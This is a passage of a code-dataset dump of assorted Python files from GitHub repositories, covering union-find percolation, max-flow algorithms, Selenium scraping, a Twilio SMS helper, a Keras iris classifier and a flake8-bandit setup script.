1, col), ## up\n (row + 1, col), ## down\n ]\n \n if row == 1:\n neighbours[2] = 0\n elif row == self.side:\n neighbours[-1] = self.side**2 + 1\n if col == 1:\n neighbours.pop(1)\n elif col == self.side:\n neighbours.pop(0)\n\n for neighbour in neighbours:\n if type(neighbour) is int:\n ## setting nrow and ncol to get virtuals\n if neighbour == 0:\n nrow, ncol = 1, 
0\n else:\n nrow, ncol = self.side+1, 1 \n\n block_neighbour = neighbour\n\n elif type(neighbour) is tuple:\n nrow, ncol = neighbour[0], neighbour[1]\n block_neighbour = self.getBlockNumber(nrow, ncol)\n\n # print(block_neighbour)\n ## possible bug:: bottom tap is on False until percolated\n ## If condition may fail\n if self.isOpen(nrow, ncol):\n self.uf.union(block_number, block_neighbour)\n\n self.track_open[block_number] = True\n self.open_sites += 1\n\n def isFull(self, row, col):\n return self.uf.connected(self.getBlockNumber(row, col), 0)\n\n def numberOfOpenSites(self):\n return self.open_sites\n\n def percolates(self):\n percolates = self.uf.connected(0, self.side**2 + 1)\n if percolates:\n self.track_open[-1] = True\n return True\n else:\n return False\n\n def getBlockNumber(self, row, col):\n # print(row, col)\n return (self.side * (row - 1) + col) \n\ndef display(land):\n print(f\"Virtual Top:: {land.uf.data[0]}\")\n for index, block in enumerate(land.uf.data[1:-1]):\n if index % land.side == 0:\n print(\"\\n\")\n print(block, end =\"\\t\")\n print(\"\\n\\nVirtual Bottom:: {}\".format(land.uf.data[-1]))\n \n print(\"\\n\\n\\n\")\n\n print(f\"Virtual Top:: {land.track_open[0]}\")\n for index, block in enumerate(land.track_open[1:-1]):\n if index % land.side == 0:\n print(\"\\n\")\n print(block, end =\"\\t\")\n print(\"\\n\\nVirtual Bottom:: {}\".format(land.track_open[-1]))\n print(\"-\"*50)\n\ndef main(land):\n while not land.percolates():\n i, j = (random.randint(2, land.side-1) for i in range(2))\n # print(block)\n # breakpoint()\n land.open(i, j)\n\n # display(land)\n print(f\"Number of open sites:: {land.numberOfOpenSites()}\")\n\n threshold = land.numberOfOpenSites() / (land.side**2) * 100\n return threshold\n\nif __name__ == '__main__':\n # land = Percolation(100)\n # print(land.getBlockNumber(7,4))\n simulations = 50\n total_time = 0\n average = 0\n\n for i in range(simulations):\n land = Percolation(100)\n total_time += main(land)\n average = total_time / simulations\n print(f\"Average opened sites for Percolation:: {average}\")\n # print(f\"Percolates at threshold:: {main(land)}\")","repo_name":"adityamonga/Algorithms","sub_path":"UnionFind/percolation/percolation.py","file_name":"percolation.py","file_ext":"py","file_size_in_byte":4428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36199949301","text":"import itertools\n\nblankBoard_columns = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J' ]\nblankBoard_rows = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n\n\nclass Player:\n def __init__(self, name, Carrier, BattleShip, Destroyer, Submarine, PatrolBoat):\n self.name = name\n self.Carrier = Carrier.split('/')\n self.BattleShip = BattleShip.split('/')\n self.Destroyer = Destroyer.split('/')\n self.Submarine = Submarine.split('/')\n self.PatrolBoat = PatrolBoat.split('/')\n\n self.Carrier_Col = (self.Carrier[0])\n self.Carrier_Row = list((self.Carrier[1]))\n self.Carrier_Row = [int(item) for item in self.Carrier_Row]\n self.Carrier = []\n self.Carrier.append(self.Carrier_Col)\n self.Carrier.append(list(self.Carrier_Row))\n\n self.BattleShip_Col = (self.BattleShip[0])\n self.BattleShip_Row = list((self.BattleShip[1]))\n self.BattleShip_Row = [int(item) for item in self.BattleShip_Row]\n self.BattleShip = []\n self.BattleShip.append(self.BattleShip_Col)\n self.BattleShip.append(list(self.BattleShip_Row))\n\n self.Destroyer_Col = (self.Destroyer[0])\n self.Destroyer_Row = list((self.Destroyer[1]))\n self.Destroyer_Row = 
[int(item) for item in self.Destroyer_Row]\n self.Destroyer = []\n self.Destroyer.append(self.Destroyer_Col)\n self.Destroyer.append(list(self.Destroyer_Row))\n\n self.Submarine_Col = (self.Submarine[0])\n self.Submarine_Row = list((self.Submarine[1]))\n self.Submarine_Row = [int(item) for item in self.Submarine_Row]\n self.Submarine = []\n self.Submarine.append(self.Submarine_Col)\n self.Submarine.append(list(self.Submarine_Row))\n\n self.PatrolBoat_Col = (self.PatrolBoat[0])\n self.PatrolBoat_Row = list((self.PatrolBoat[1]))\n self.PatrolBoat_Row = [int(item) for item in self.PatrolBoat_Row]\n self.PatrolBoat = []\n self.PatrolBoat.append(self.PatrolBoat_Col)\n self.PatrolBoat.append(list(self.PatrolBoat_Row))\n\n return\n\n def Overlapping(self):\n self.cart_Carrier = itertools.product(self.Carrier[0], self.Carrier[1])\n self.cart_BattleShip = itertools.product(self.BattleShip[0], self.BattleShip[1])\n self.cart_Destroyer = itertools.product(self.Destroyer[0], self.Destroyer[1])\n self.cart_Submarine = itertools.product(self.Submarine[0], self.Submarine[1])\n self.cart_PatrolBoat = itertools.product(self.PatrolBoat[0], self.PatrolBoat[1])\n\n self.cart_Carrier = list(self.cart_Carrier)\n self.cart_BattleShip = list(self.cart_BattleShip)\n self.cart_Destroyer = list(self.cart_Destroyer)\n self.cart_Submarine = list(self.cart_Submarine)\n self.cart_PatrolBoat = list(self.cart_PatrolBoat)\n self.cart_Total2 = self.cart_Carrier + self.cart_BattleShip + self.cart_Destroyer + self.cart_Submarine + self.cart_PatrolBoat\n\n for k in self.cart_Total2:\n if self.cart_Total2.count(k) > 1:\n print('Overlapping found, calculating again')\n print(f'overlapping occurred at {k}')\n print(\"Please re-enter Coordinates\")\n break\n\n return self.cart_Total2\n","repo_name":"do7urden/LocalWorkGround","sub_path":"OD_HW_BTE514B/HW_8/Player1_HW_8.py","file_name":"Player1_HW_8.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33158500891","text":"# https://httpbin.org\n# pip install requests\n\nimport requests\n\nBASE_URL = \"https://httpbin.org/\"\n\nresponse = requests.get(\n BASE_URL + \"/get?test=hello&other=world\", headers={\"User-Agent\": \"something else\"}\n)\nresponse = response.json()\ndel response[\"origin\"]\n\nprint(response)\n","repo_name":"FDlucifer/python-climb-learning-tutorial","sub_path":"python-tips-and-tricks/HTTPBin - Experimenting, Debugging & Testing of Network Applications/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"32"} +{"seq_id":"30564708646","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\n\ndef findpeople():\n driver = webdriver.Chrome('/Users/sungmin/chromedriver')\n driver.get('http://www.gdlibrary.or.kr/gilib/1000658/100049/bbsList.do')\n\n url = 'http://www.gdlibrary.or.kr/gilib/1000658/100049/bbsList.do'\n req = requests.get(url)\n html = req.text\n soup = BeautifulSoup(html, 'html.parser')\n\n nowday = \"2020-09-05\"\n rank= 0\n ##첫페이지\n for tag in soup.select('td'):\n if tag.text == nowday:\n rank=rank+1\n\n ##두번쨰페이지\n driver.find_element_by_xpath(\"\"\"//*[@id=\"listForm\"]/div[2]/p/span[2]/a\"\"\").click()\n for tag in soup.select('td'):\n if tag.text == nowday:\n rank=rank+1\n \n ##세번째페이지\n driver.find_element_by_xpath(\"\"\"//*[@id=\"listForm\"]/div[2]/p/span[6]/a\"\"\").click()\n for tag in 
soup.select('td'):\n if tag.text == nowday:\n rank=rank+1\n\n print(\"오늘의 안심도서대출은 \"+str(rank-1) +\"명 입니다.\")\n\n\nfindpeople()\n\n\n\"\"\"\"\n//*[@id=\"listForm\"]/div[2]/p/span[4]/a\n//*[@id=\"listForm\"]/div[2]/p/span[5]/a\n//*[@id=\"listForm\"]/div[2]/p/span[6]/a\n//*[@id=\"listForm\"]/div[2]/p/span[7]/a\n//*[@id=\"listForm\"]/div[2]/p/span[8]/a\n//*[@id=\"listForm\"]/div[2]/p/span[12]/a\n//*[@id=\"listForm\"]/div[2]/p/span[4]/a\nrank= 0\nnow = datetime.datetime.now()\nnowday1 = (str(now.year)+\"-\"+str(now.month)+\"-\"+str(now.day))\nnowday = \"2020-08-28\"\n\"\"\"\n\n","repo_name":"sungmin69355/webcrawling","sub_path":"gdlibrary.py","file_name":"gdlibrary.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20541042529","text":"import time\nimport pytest\nfrom selenium import webdriver\nfrom selenium.webdriver.remote.webdriver import WebDriver\nfrom allure_commons._allure import step, attach\nfrom allure import attachment_type\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common import action_chains\n\n\nclass UserWorkspacePage(object):\n def __init__(self, web_driver):\n self.driver = web_driver\n self.diprella_header = WebDriverWait(self.driver, 10).until(\n EC.visibility_of_element_located((By.CSS_SELECTOR, \".main__wrapper\")))\n self.diprella_logo = WebDriverWait(self.driver, 15).until(\n EC.visibility_of_element_located((By.CSS_SELECTOR, \".header__logo\")))\n self.course_search = self.driver.find_element_by_xpath(\"//input[@id='search' and @type='text']\")\n self.recommendations = self.driver.find_element_by_xpath(\"//section[@class='recomendations'][1]\")\n self.popular = self.driver.find_element_by_xpath(\"//section[@class='recomendations'][2]\")\n self.lector_menu = 0\n self.user_menu = 0\n attach(\n self.driver.get_screenshot_as_png(),\n name=\"User workspace page screenshot\",\n attachment_type=attachment_type.PNG\n )\n\n @step(\"Opening Lector menu\")\n def open_lector_menu(self):\n action_chains.ActionChains(self.driver).move_to_element(\n self.driver.find_element_by_xpath(\"//nav/a/span[text()='Лектор']\")\n ).click().perform()\n time.sleep(0.5)\n self.lector_menu = self.driver.find_element_by_xpath(\"//div[@class='lecturer__dropdown']\")\n attach(\n self.driver.get_screenshot_as_png(),\n name=\"User workspace page with opened Lector menu\",\n attachment_type=attachment_type.PNG\n )\n return self\n\n @step(\"Opening User menu\")\n def open_user_menu(self):\n action_chains.ActionChains(self.driver).move_to_element(\n self.driver.find_element_by_css_selector(\"a.home__header-nav-link:nth-child(2)\")\n ).click().perform()\n time.sleep(0.5)\n self.user_menu = self.driver.find_element_by_xpath(\"//div[@class='user__dropdown']\")\n attach(\n self.driver.get_screenshot_as_png(),\n name=\"User workspace page with opened User menu\",\n attachment_type=attachment_type.PNG\n )\n return self\n","repo_name":"51stRoR/DiprellaNK","sub_path":"page_objects/userworkspace_page.py","file_name":"userworkspace_page.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12400992055","text":"from datetime import timedelta\r\n\r\nfrom django.utils.timezone import now\r\nfrom psqlextra.query import ConflictAction\r\nfrom psqlextra.util import 
postgres_manager\r\n\r\nfrom .esi import ESI\r\nfrom .models import Alliance, Corporation, Character\r\nfrom .utils import chunker\r\n\r\n\r\ndef hydrate(Model, ids, days_until_dehydrated=14):\r\n \"\"\"\r\n Make sure these objects exist in the database.\r\n Returns the number of dry objects that were hydrated.\r\n \"\"\"\r\n hydrated = set(Model.objects.filter(\r\n id__in=ids,\r\n updated__gt=now() - timedelta(days=days_until_dehydrated)\r\n ).values_list('id', flat=True))\r\n dry = set(ids) - hydrated\r\n\r\n if len(dry) < 1:\r\n return 0\r\n\r\n # Resolve dry objects from ESI\r\n objects = []\r\n api = ESI()\r\n for ids in chunker(dry, 1000):\r\n response = api.post(\"/latest/universe/names/\", json=ids)\r\n for item in response.json():\r\n objects.append({\r\n 'id': item['id'],\r\n 'name': item['name']\r\n })\r\n with postgres_manager(Model) as manager:\r\n manager.on_conflict(['id'], ConflictAction.UPDATE).bulk_insert(objects)\r\n return len(dry)","repo_name":"skyride/capritools3","sub_path":"core/bulk.py","file_name":"bulk.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"33090446667","text":"#!/usr/bin/python3\n# coding: utf-8\n# + 是边的起点\nimport pprint\nimport numpy as np\n##################################################################\n## 原始图: 最大流: 最终结果为 23\n# 12 12\n# 1+-------->3 1+-------->3\n# /+^ /^+ /^ ^+\n# 16 / || / | \\20 11 / | | \\19\n# / ||4 / | \\ / | | \\\n# + || 9 / | \\ + | | \\\n# 0 10|| / |7 5 0 |1 |7 5\n# + || / | / + | | /\n# 13\\ || / | / 12\\ | | /\n# \\ || / | /4 \\ | | /4\n# \\v++ ++ \\+ ++\n# 2+-------->4 2+-------->4\n# 14 11\ngraph = [[0, 16, 13, 0, 0, 0],\n [0, 0, 10, 12, 0, 0],\n [0, 4, 0, 0, 14, 0],\n [0, 0, 9, 0, 0, 20],\n [0, 0, 0, 7, 0, 4],\n [0, 0, 0, 0, 0, 0]]\n##################################################################\n## 一: Ford Fulkerson\nclass Graph: # 虽然很不喜欢 class, 但这里确实比较方便\n def __init__(self, graph):\n self.graph = graph # residual graph\n self.ROW = len(graph)\n def BFS(self, s, t, parent): # Returns true if there is a path from source 's' to sink 't' in residual graph. Also fills parent[] to store the path\n vis, queue = {s}, [s] # Mark all the vertices as not visited\n while queue:\n u = queue.pop(0) # Dequeue a vertex from queue\n for ind, val in enumerate(self.graph[u]): # 这里的 ind 是刚好表示 ID\n if ind not in vis and val > 0 :\n vis.add(ind)\n queue.append(ind)\n parent[ind] = u # 存储每次找到的路径, FordFulkerson() 会用\n return True if t in vis else False\n def FordFulkerson(self, source, sink): # Returns tne maximum flow from s to t in the given graph\n parent = [-1] * (self.ROW) # This array is filled by BFS and to store path\n max_flow = 0 # There is no flow initially\n while self.BFS(source, sink, parent): # 每执行一次 BFS, parent 中就会存一次从 s -> t 的路径\n path_flow = float(\"Inf\")\n s = sink\n while(s != source): # Find minimum residual capacity of the edges along the path filled by BFS. 
Or we can say find the maximum flow through the path found.\n path_flow = min(path_flow, self.graph[parent[s]][s])\n s = parent[s] # 这里的循环很不和谐, 下一步用函数式改写\n # 上面的���环不能和下面的合并, 因为要先找到瓶颈 path_flow\n max_flow += path_flow # Add path flow to overall flow\n v = sink\n while(v != source): # update residual capacities of the edges and reverse edges along the path\n u = parent[v]\n self.graph[u][v] -= path_flow\n self.graph[v][u] += path_flow\n v = parent[v]\n return max_flow\n#################################\n## 测试 graph 矩阵\ng = Graph(graph)\nprint(\"The maximum possible flow is %d \" % g.FordFulkerson(0, 5))\n#################################\n## 测试 算法作业数据集\n# For each data set, the first line has two number N and M, which means the number of jobs and the number of computers.\n# Next N line, each line for a job, has two number which means the two computers.\nraw = \"4 2\\n 1 2\\n 1 2\\n 1 2\\n 1 2\" # file = open(problem1.data).read()\njobs, computers = [int(x) for x in raw.split('\\n')[0].split()]\n# 构造 graph; 好不美观啊...\ngraph = np.zeros((jobs + computers + 2, jobs + computers + 2), dtype=np.int); pprint.pprint(graph)\nfor i in range(jobs): graph[0][i + 1] = 1 # s 到 jobs 边填充 1; 单向的\nfor idx, line in enumerate(raw.split('\\n')[1:]): # 这里以后也要用函数式写出来\n print(idx, line)\n for computer_id in [int(x) for x in line.split()]:\n graph[idx + 1][jobs + computer_id] = 1 # 单向, 从 jobs 到 computers\n# 二分法查找\nL, R = jobs // computers, jobs; print(L, R)\nwhile L < R:\n tmp = graph.copy()\n k = (L + R) // 2; print(k)\n tmp[jobs + 1:-1, -1] = k\n pprint.pprint(tmp)\n flow = Graph(tmp).FordFulkerson(0, jobs + computers + 1)\n if flow == jobs: R = k\n else: L = k\nprint('The min-max load is', k)\nprint(\"The maximum possible flow is %d \" % flow)\n\n##################################################################\n## 二: Push Relabel\n## 这里没用 class; 但还是用 class 方便\ndef push(Gf, height, excess_flow, u):\n if excess_flow[u] <= 0: return False\n for v in range(len(Gf)):\n if v != u and Gf[u][v] > 0 and height[u] == height[v] + 1:\n df = min(excess_flow[u], Gf[u][v])\n Gf[u][v] -= df\n Gf[v][u] += df\n excess_flow[u] -= df\n excess_flow[v] += df\n return True\n return False\ndef relabel(Gf, height, excess_flow, u):\n if excess_flow[u] <= 0: return False\n min_h = np.inf\n for v in range(len(Gf)):\n if v != u and Gf[u][v] > 0:\n if height[u] > height[v]: return False\n else: min_h = min(min_h, height[v])\n height[u] = min_h + 1\n return True\ndef initialize_preflow(G, s):\n n = len(G)\n height = [0] * n\n excess_flow = [0] * n\n height[s] = n\n for v in range(n): # 将 excess_flow 中与 s 紧邻的进行初始化\n if v != s and G[s][v] != 0: # 写的不好...\n excess_flow[v] = G[s][v]\n excess_flow[s] -= G[s][v]\n G[v][s] = G[s][v]\n G[s][v] = 0\n return G, height, excess_flow\ndef push_relabel(G, s, t): # 算法实现主体\n n = len(G)\n Gf, height, excess_flow = initialize_preflow(G, s)\n while True:\n push_or_relabel = False\n for u in range(n):\n if u != s and u != t:\n if push(Gf, height, excess_flow, u):\n push_or_relabel = True\n break\n if relabel(Gf, height, excess_flow, u):\n push_or_relabel = True\n break\n if not push_or_relabel: break\n # else: print(Gf)\n max_flow = 0\n for j in range(n): max_flow += Gf[j][s]\n return max_flow\n#################################\n## 卜东波 老师作业 Network Flow 第二题\n# For each data set, the first line has two number M and N, which means the matrix is M*N.\n# Next 2 line, the first line has M number, which indicate the sum of rows and the second line means the sum of columns.\n# 10 10\n# 5 5 7 7 6 3 5 7 7 3\n# 6 6 7 4 5 
6 6 4 4 7\n## 数据预处理\nraw = '10 10\\n 5 5 7 7 6 3 5 7 7 3\\n 6 6 7 4 5 6 6 4 4 7' # raw = open('problem2.data').read()\nrow, col = [int(x) for x in raw.split('\\n')[0].split()]; print(row, col)\ngraph = np.zeros((row + col + 2, row + col + 2), dtype=np.int)\nprint(graph.shape) # (22, 22)\nfor idx, value in enumerate(raw.split('\\n')[1].split()): graph[0][idx + 1] = value\nfor idx, value in enumerate(raw.split('\\n')[2].split()): graph[row + idx + 1][-1] = value\n# 二分图之间全连接, 对角连接\ngraph[1:-1, 1:-1][:row, -col:] = 1\n# graph[1:-1, 1:-1][row:, :-col] = 1\npprint.pprint(graph)\n\n## 用 Flow Fulkerson 进行验证\ntmp = graph.copy()\nflow = Graph(tmp).FordFulkerson(0, row + col + 1)\nprint(flow) # 55\n\n## 用 Push Relabel 运行\ntmp = graph.copy()\nmax_flow = push_relabel(tmp, 0, row + col + 1)\npprint.pprint(tmp)\nmatrix = tmp[row+1:-1, 1:row+1].T # tmp 右上角为剩余网络, 左下角为反向网络, 所以取左下角的转置\nprint(matrix)\n# [[1 0 0 0 0 0 1 1 1 1]\n# [1 0 0 0 0 0 1 1 1 1]\n# [1 0 0 0 1 1 1 1 1 1]\n# [1 0 1 0 0 1 1 1 1 1]\n# [0 1 1 1 1 1 0 0 0 1]\n# [0 1 1 0 0 1 0 0 0 0]\n# [0 1 1 1 1 0 0 0 0 1]\n# [0 1 1 1 1 1 1 0 0 1]\n# [1 1 1 1 1 1 1 0 0 0]\n# [1 1 1 0 0 0 0 0 0 0]]\n\n##################################################################\n## 总结:\n# 1. 网络流关键使用 (V+2) * (V+2) 的矩阵来表示\n# 这样最后的结果:\n# 右上角小矩阵为残差网络/剩余网络, 用来找增广路\n# 左下角小矩阵为反向边, 记录了每条边现有的流量\n","repo_name":"HCShi/jShellscript","sub_path":"bin/template/src/jptalgorithm/l68_Ford-Fulkerson_Push-Relabel.py","file_name":"l68_Ford-Fulkerson_Push-Relabel.py","file_ext":"py","file_size_in_byte":8319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11010071065","text":"#WAPT get even indexed word as key and odd indexed word as its value\ns='the quick brown fox jumps over the lazy the brown dog'\nl=s.split()\nd={}\nl1=[]\nfor i in range(0,len(l)-1,2):\n if l[i] not in d:\n d[l[i]]=l[i+1]\n else:\n l1.append(l[i])\nprint(d)\nprint(l1)\n","repo_name":"yogeshrakate/Dictionary","sub_path":"using dict.py","file_name":"using dict.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33230665608","text":"### IMPORTS\nimport os \n\nfrom twilio.rest import Client\nfrom google.cloud import firestore\nfrom flask import jsonify\n\n# Your Account Sid and Auth Token from twilio.com/console\n# DANGER! This is insecure. See http://twil.io/secure\n### CONSTANTS\n\n# US_SMS_CODE = '+1'\nPOKE_FROM_NUM = '+12063124797'\nACCOUNT_SID = os.environ['ACCOUNT_SID']\nAUTH_TOKEN = os.environ['AUTH_TOKEN']\n\ntemplate_body = 'Poke (Founders): Hi! We are reaching out to confirm you choosing the {} for {} points as your reward! 
Please reply with a YES or a NO, to confirm or deny.'\nDB = firestore.Client()\n\ndef get_user(uid):\n return DB.collection(u'Users').document(\n u'{}'.format(uid)).get().to_dict()\n\ndef set_user(uid, user_as_json):\n doc_ref = DB.collection(u'Users').document(uid)\n doc_ref.set(user_as_json)\n\ndef get_reward(rid):\n return DB.collection(u'Rewards').document(\n rid).get().to_dict()\n\ndef format_body(reward_name, reward_points):\n\treturn template_body.format(reward_name, reward_points)\n\ndef send_sms(body, from_num, to_num):\n\tclient = Client(ACCOUNT_SID, AUTH_TOKEN)\n\tmessage = client.messages.create(body=body, \n\t\tfrom_=from_num, to=to_num)\n\ndef test_entrypoint(uid, rid):\n\tuser_num = get_user(uid)['phone']\n\treward = get_reward(rid)\n\trname = reward['name']\n\trcost = reward['cost']\n\n\tbody = format_body(rname, rcost)\n\tsend_sms(body, POKE_FROM_NUM, user_num)\n\ndef entrypoint(request):\n\tuid = request.args['uid']\n\tuser_num = get_user(uid)['phone']\n\n\trid = request.args['rid']\n\treward = get_reward(rid)\n\trname = reward['name']\n\trcost = reward['cost']\n\n\tbody = format_body(rname, rcost)\n\tsend_sms(body, POKE_FROM_NUM, user_num)\n\treturn jsonify(status='success', code='send-reward-text')\n\n\"\"\"\nif __name__ == '__main__':\n\ttest_entrypoint('1076440981d44efb', '6eb3ec5989704013')\n\"\"\"\n\n\n","repo_name":"poke-saas/poke","sub_path":"scripts/cloud_functions/send_reward_text.py","file_name":"send_reward_text.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"8413416849","text":"# This source code is licensed under the license found in the\n# LICENSE file in the root directory of this source tree.\n# --------------------------------------------------------\n# compute O/E normalized matrix as extra channel.\n# --------------------------------------------------------\n\nimport numpy as np\n\nclass oe_normalize:\n def __init__(self, cutoff = 16) -> None:\n self.cutoff = cutoff\n def __call__(self, data):\n matrix = data['hic']\n n, _ = matrix.shape\n out = np.copy(matrix).astype(float)\n for d in range(n):\n p = np.arange(n-d)\n e = np.mean(matrix[p, p+d])\n if e>0:\n out[p, p+d] /= e\n # input matrix should be symmetric\n out[p+d, p] /= e\n \n out = np.minimum(out, self.cutoff)\n out = out / self.cutoff\n out = np.expand_dims(out, 0)\n return out\n","repo_name":"CHNFTQ/Capricorn","sub_path":"data_processing/oe_normalize.py","file_name":"oe_normalize.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"20497816829","text":"from pymongo import MongoClient\nfile = 'user_follow'\nreadPath = '/Users/alfonso/workplace/googleSync/yelp_dataset_sql/' + file + '.txt'\nwritePath = '/Users/alfonso/workplace/googleSync/yelp_dataset_sql/' + file + '_lv.txt'\n\ndbName = 'yelpdb'\n\nclient = MongoClient('mongodb://localhost:27017/')\ndb = client[dbName]\n\n\ndef read4txt():\n i = 0\n with open(readPath, 'r') as f:\n for sql in f:\n userid = sql.split('(')[2].split(',')[0].replace(\"'\", '')\n\n if db.userids.find_one({'uid': hash(userid)}) is not None:\n write2txt(sql)\n\n i += 1\n if i % 100000 == 0:\n print('now is ' + str(i))\n\n\ndef write2txt(sql: str):\n with open(writePath, 'a') as f:\n 
f.write(sql)\n\nread4txt()\n","repo_name":"SixingYan/yelp_dataset_process","sub_path":"sampler/ur_sampler.py","file_name":"ur_sampler.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16282906850","text":"import io\nimport os\nimport sys\nfrom shutil import rmtree\n\nfrom setuptools import setup, Command\n\n\ndef get_version(fname=\"flake8_bandit.py\"):\n with open(fname) as f:\n for line in f:\n if line.startswith(\"__version__\"):\n return eval(line.split(\"=\")[~0])\n\n\n# Package meta-data.\nNAME = \"flake8_bandit\"\nDESCRIPTION = \"Automated security testing with bandit and flake8.\"\nURL = \"https://github.com/tylerwince/flake8-bandit\"\nEMAIL = \"tyler@myndshft.com\"\n\nAUTHOR = \"Tyler Wince\"\n\n# What packages are required for this module to be executed?\nREQUIRED = [\"flake8\", \"bandit\"]\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\nwith io.open(os.path.join(here, \"README.md\"), encoding=\"utf-8\") as f:\n long_description = \"\\n\" + f.read()\n\n\nclass UploadCommand(Command):\n \"\"\"Support setup.py upload.\"\"\"\n\n description = \"Build and publish the package.\"\n user_options = []\n\n @staticmethod\n def status(s):\n \"\"\"Print things in bold.\"\"\"\n print(\"\\033[1m{0}\\033[0m\".format(s))\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n pass\n\n def run(self):\n try:\n self.status(\"Removing previous builds...\")\n rmtree(os.path.join(here, \"dist\"))\n except OSError:\n pass\n\n self.status(\"Building Source and Wheel (universal) distribution...\")\n os.system(\"{0} setup.py sdist bdist_wheel --universal\".format(\n sys.executable))\n\n self.status(\"Uploading the package to PyPi via Twine...\")\n os.system(\"twine upload dist/*\")\n\n sys.exit()\n\n\nsetup(\n name=NAME,\n version=get_version(),\n description=DESCRIPTION,\n long_description=long_description,\n author=AUTHOR,\n author_email=EMAIL,\n url=URL,\n py_modules=[\"flake8_bandit\"],\n install_requires=REQUIRED,\n include_package_data=True,\n license=\"MIT\",\n entry_points={\n \"flake8.extension\": [\n \"B=flake8_bandit:BanditTester\",\n ],\n },\n classifiers=[\n \"Framework :: Flake8\",\n \"Environment :: Console\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 3\",\n \"Topic :: Security\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"Topic :: Software Development :: Quality Assurance\",\n ],\n cmdclass={\n \"upload\": UploadCommand,\n }, )\n","repo_name":"myii/flake8-bandit","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"18783697722","text":"\n\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, BatchNormalization\nfrom sklearn.metrics import accuracy_score\nfrom keras.utils import to_categorical\nimport numpy as np\n\n#붓꽃데이터 읽어들이기\ncolnames = ['SepalLength', 'SepalWidth', 'PetalLength', 'PetalWidth', 'Name'] \niris_data = pd.read_csv(\"./data/iris.csv\", names= colnames, encoding='utf-8')\n\n#붓꽃 데이터를 레이블과 입력 데이터로 뷴리하기\ny = iris_data.loc[:, \"Name\"]\nx = iris_data.loc[:, [\"SepalLength\", \"SepalWidth\", \"PetalLength\", \"PetalWidth\"]]\n\n# 
string one hot encoding\nfrom sklearn.preprocessing import LabelEncoder\nencoder = LabelEncoder()\nencoder.fit(y)\ny = encoder.transform(y)\n\ny = to_categorical(y).astype(int)\n\n#학습 전용과 테스트 전용 분리하기\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size = 0.2, train_size = 0.8, shuffle=True)\n\n#학습하기\nmodel = Sequential()\n\nmodel.add(Dense(1000, input_dim = 4))\nmodel.add(Dense(3, activation='softmax'))\n\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'] )\nmodel.fit(x_train, y_train, epochs=50, batch_size=1)\n#평가하기\ny_pred = model.predict(x_test)\ny_pred = np.argmax(y_pred, axis=1)\nprint(y_pred)\ny_pred = encoder.inverse_transform(y_pred)\nprint(y_pred)\nacc = model.evaluate(x_test, y_test, batch_size=1)\nprint(\"정답률: \",acc[1] )\n","repo_name":"sangmain/ai_study","sub_path":"AI/ml/m05_iris_keras.py","file_name":"m05_iris_keras.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"61945918","text":"# -*- coding: utf-8 -*-\nimport sys\nimport socket\nimport time\nimport traceback\n\n\ndef get_error():\n '''\n 1.使用sys.exc_info接受返回的数组包含异常的对象类型,异常的值以及一个traceback对象,对象中包含出错的行数、位置等数据\n 2.使用traceback模块提供的extract_tb函数来更加详细的解释traceback对象所包含的数据,数据包含异常文件名,异常的函数名,异常所在行,异常的报错点\n :return:\n '''\n\n # ip = socket.gethostbyname(socket.gethostname())\n times = time.strftime('%Y/%m/%d %H:%M:%S', time.localtime(time.time()))\n text = \"\"\n ex_type, ex_val, ex_stack = sys.exc_info()\n\n for filename, linenum, funcname, source in traceback.extract_tb(ex_stack):\n txt=\"{times} '{filename}', line{linenum}, in {funcname}\\n\\t{source}\\n\".format(times=times, filename=filename, linenum=linenum, source=source, funcname=funcname)\n text += txt\n\n if text:\n text += \"{ErrorType}:{Value}\\n\".format(ErrorType=ex_type, Value=ex_val)\n\n with open('logging', 'ab+') as f:\n f.write(text.encode('utf8'))\n f.close()\n return 